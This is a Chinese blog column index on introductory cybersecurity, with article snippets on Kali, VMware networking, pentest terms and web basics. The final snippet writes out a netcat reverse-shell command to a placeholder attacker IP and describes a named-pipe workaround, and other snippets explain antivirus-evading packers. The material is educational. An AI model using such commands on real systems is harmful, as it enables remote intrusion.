
网络安全
文章平均质量分 78
以实战为牵引,从浅入深学习网安知识
蜗牛hb
这个作者很懒,什么都没留下…
展开
-
Kali基础知识
网络和监控命令类似于这些: hostname, ping, ifconfig, iwconfig, netstat, nslookup, traceroute, finger, telnet, ethtool 用于查看 linux 服务器 ip 地址,管理服务器网络配置,通过 telnet 和 ethernet 建立与 linux 之间的网络链接,查看 linux 的服务器信息等。这个命令,会把本地已安装的软件,与刚下载的软件列表里对应软件进行对比,如果发现已安装的软件版本太低,就会提示你更新。原创 2024-12-26 10:24:13 · 484 阅读 · 0 评论 -
VMware Workstation虚拟机网络模式
假设你家申请到了一个公网IP,那么你可以访问公网,公网上的其他IP也可以访问你,但是如果你家有很多台设备要上网,仅有一个公网IP是不够用的,于是就可以利用路由器的NAT功能,让路由器给家庭内部的不同设备分配不同的私网地址,当这些设备要向外发送数据时,NAT就把私有地址转换成公网地址,并且可以用端口进行标识,当数据从公网向设备传递时,NAT再把公网地址转换成私有地址。虚拟出来的网段和NAT模式虚拟网卡的网段是一样的,包括NAT服务器的IP地址也是这个网段。所以两个网卡的IP地址也要设置为同一网段。原创 2024-12-24 15:21:25 · 919 阅读 · 0 评论 -
渗透测试(入侵检测)基本术语(二)
用于在IP主机、路由器之间传递控制消息,包括网络通不通、主机是否可达、路由是否可用等消息,常用的Ping命令就是基于ICMP协议的,该协议对于网络安全有着重要意义,它本身的特性决定了它非常容易被用于攻击网络上的路由器和主机,例如海信主页被黑事件就是以ICMP攻击为主,操作系统规定ICMP数据包最大尺寸不超过64KB,因而如果向目标主机发送超过64KB上限的数据包,该主机就会出现内存分配错误,进而导致系统耗费大量的资源处理,最终瘫痪死机。比较常用的一种攻击技术,实施简单但威力巨大,大多是无视防御的。原创 2024-12-23 13:33:56 · 681 阅读 · 0 评论 -
渗透测试(入侵检测)基本术语(一)
攻击者用来隐藏自己的行踪和保留root访问权限的工具。利用特殊的算法,将EXE可执行程序或者DLL动态连接库文件的编码进行改变(比如压缩、加密),以达到防止反编译、缩小文件体积、加密程序编码、躲过杀毒软件查杀的目的,常见的壳有UPX,ASPack,PePack,PECompact,UPack,免疫007,木马彩衣等。情报收集系统,蜜罐系统是一个故意让人攻击的目标,引诱黑客来攻击,攻击者攻击后,就可以知道他是如何得逞的,还可以通过窃听黑客间的联系,收集黑客所用的种种工具,并且掌握他们的社交网络。原创 2024-12-18 17:07:21 · 387 阅读 · 0 评论 -
PHP基础
1.PHP简述PHP(全称:PHP:Hypertext Preprocessor,即"PHP:超文本预处理器")是一种通用开源脚本语言。PHP 文件可包含文本、HTML、JavaScript代码和 PHP 代码 PHP 代码在服务器上执行,结果以纯 HTML 形式返回给浏览器 PHP 文件的默认文件扩展名是 ".php" PHP 可以生成动态页面内容 PHP 可以创建、打开、读取、写入、关闭服务器上的文件 PHP 可以收集表单数据 PHP 可以发送和接收 cookies PHP 可以添原创 2024-12-16 16:38:53 · 865 阅读 · 0 评论 -
JavaScript基础
4、var arr = new Array(10,20,{"name":"tomy","age":19},0.1,"string",true,["aaa","bbb"])//定义的同时赋值。2、var arr=[10,20,{"name":"tomy","age":19},0.1,"string",true,["aaa","bbb"]]//定义的同时赋值。<input type="button" value="点击一下" onclick="alert('网络安全');原创 2024-12-13 23:37:03 · 707 阅读 · 0 评论 -
DIV+CSS基础
行内元素的margin、padding属性很特殊,水平方向的padding-left、padding-rigtht、margin-left、padding-right都会产生边距效果,但是竖直方向的padding-top、padding-bottom、margin-top、margin-bottom却不产生边距效果。georgian: 乔治亚数字,例如: an, ban, gan, ..., he, tan, in, in-an, ...参阅:list-style-position 中可能的值。原创 2024-12-13 15:14:46 · 250 阅读 · 0 评论 -
HTML基础
百度</a><a href="http://www.baidu.com" target="self">百度原创 2024-12-13 14:53:41 · 248 阅读 · 0 评论 -
netcat工具无法使用 -e 参数
使用mkfifo或mknod命令创建一个命名管道,然后使用cat命令读取管道中的内容,并将其传递给/bin/sh执行,再将输出重定向到nc连接。nc -e /bin/sh 攻击者的IP 端口。当在linux中使用netcat进行反向连接时,这说明此netcat不支持 -e 参数。原创 2024-05-11 08:46:34 · 399 阅读 · 0 评论